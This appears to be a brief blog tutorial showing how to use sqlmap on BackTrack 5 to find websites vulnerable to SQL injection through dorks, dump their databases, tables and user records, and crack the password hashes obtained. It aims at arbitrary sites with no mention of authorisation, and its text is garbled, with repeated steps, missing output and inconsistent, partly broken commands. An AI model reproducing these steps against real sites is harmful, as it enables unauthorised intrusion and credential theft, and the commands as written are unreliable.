Hi, in this tutorial, I’ll be showing you a simple SQL Injection using BackTrack 5.
[dbname] = Database name; [tbname] = Table name; [cmname] = Column name.
1. Open up sqlmap
2. One we load the terminal, we wanna find a vunerable site.
Use any dork or check any posted vulns
3. Now, it’s time for the codes
./sqlmap.py -u website.com/index.php?id=? --dbs
With this command, you’ll be able to extract the databases.
Looks like this:
Looks like this:
3. Once we have the DBS, it’s time to get the tables.
./sqlmap website.php/index.php?id=? -D [dbname] --tables
4. After we get the tables which looks like this:
We need to get the columns.
Now, we need to write:
.sqlmap.py -u website.com/index.php?id=? -D [dbname] -T [tbname] --columns
5. Once we get the columns
We need to dump the files.
.sqlmap.py -u website.com/index.php?id=? -D [dbname] -T [tbname] -C [cbname] --dump
Example .sqlmap.py -u website.com/index.php?id=? -D information_shema -T users -C username –dump
6. After we do this, we will get encrypted password.
How to decrypt!?
You can decrypt online, or using the aforementioned hash.py.
How to use Hash.py!?
6. After we do this, we will get encrypted password.
How to decrypt!?
You can decrypt online, or using the aforementioned hash.py.
How to use Hash.py!?
Download link for Hash.py
1. Move it to /root
2. Open up your BT5 Terminal
3. Locate your file, in our case /root/hash.py
2. Open up your BT5 Terminal
3. Locate your file, in our case /root/hash.py
/root/hash.py
We have Online & Offline attack methods.
If you wanna use the offline method, you need a wordlist.
If you wanna use the offline method, you need a wordlist.
0 nhận xét
Đăng nhận xét